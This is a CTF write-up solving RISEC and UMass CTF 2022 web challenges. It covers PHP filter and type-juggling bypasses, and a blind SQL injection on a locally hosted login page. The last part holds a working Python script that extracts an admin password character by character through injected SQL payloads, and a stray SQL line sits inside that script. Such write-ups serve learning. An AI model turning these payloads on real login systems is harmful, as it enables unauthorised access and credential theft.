RISEC CTF + UMass CTF 2022

Note : A JOURNEY TO GAIN KNOWLEDGE

Web Challenge

RISEC CTF

Pretty Horrible Program 1

  <?php
  if (isset($_GET['bingus'])) {
    $input = $_GET['bingus'];
    $to_replace = 'bingus';
    $clean_string = preg_replace("/$to_replace/", '', $input);
    echo "<p>Your string is: $clean_string</p>";
    if ($clean_string == $to_replace) {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: green;\">IS</span> your beloved</h2>";
      output_flag();
    } else {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: red;\">IS NOT</span> your beloved</h2>";
    }
  }
  ?>

• Notice that $clean_string genererated by replacing

• So that we just input something that after replacing. it's equal to 'bingus'

demo:

Pretty Horrible Program 2

class User
  {
    public $role = 'Admin'; 	
}

$default_user = new User;
$_COOKIE = serialize($default_user);
setcookie(
    'user',
    serialize($default_user)
  );
$a=unserialize($_COOKIE);
echo "$_COOKIE"

Pretty Horrible Program 3

<?php
  if (isset($_GET['input1']) and isset($_GET['input2'])) {
    if ($_GET['input1'] == $_GET['input2']) {
      print '<h3 class="error">Nice try, but it won\'t be that easy ;)</h3>';
    } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) {
      output_flag();
    } else {
      print '<h3 class="error">Your inputs don\'t match</h3>';
    }
  }
  ?>
  <p>See if you can make the sha256 hashes match</p>
  <br />
  <a href="/php3/index.php?source=true">Source Code</a>
  <form method="get">
    <input type="text" required name="input1" placeholder="Input 1" />
    <p>Hash: <?php if (isset($_GET['input1'])) print hash("sha256", $_GET['input1']) ?></p>
    <input type="text" required name="input2" placeholder="Input 2" />
    <p>Hash: <?php if (isset($_GET['input2'])) print hash("sha256", $_GET['input2']) ?></p>
    <input type="submit" />
  </form>
</body>

</html>
<?php

Workflow:

• At first, i just try to find around the key work "SHA256 collision" but we got this one , it takes about ≈3.6×1013 years to find, so that it's not a practical option.

• After that i focused on '==' in php. Searching around and i got this and this

• Now you just put [] in input and get flag.

UMass CTF

venting

This challenge ended and the website was turned off. So i build it in docker from here

• when you connectn try to see history in burpsuite, you can get the link redirect to the login page

• Now read the hint with 'admin' in user and password does't have fillter so that mean that may be SQLI. Exactly. that's is blind SQLI

• I solve this challenge by burpsuite as same as this lab

otherway, try to bruteforce by python request:

import requests, string

url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login"
s = requests.session()

passwordRetrieve = ""
# ' or (select 'a' from users where username='admin' and length(Password)>36)='a

def solve():
    global passwordRetrieve
    index = 0
    while True:
        for char in string.printable:
            usernamefield = "\\"
            passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a"
            postParam = {'user': usernamefield, 'pass': passwordfield}
            response = s.post(url, data=postParam).text
            if "Invalid" not in response:
                passwordRetrieve += char
                index += 1
                print(passwordRetrieve)
                break
        if (index == 37):
            break
SELECT * from users WHERE username='admin\' AND Password = ''or 'True'
solve()

Thanks for reading. Have a good day ❤️ !

Contact:

• facebook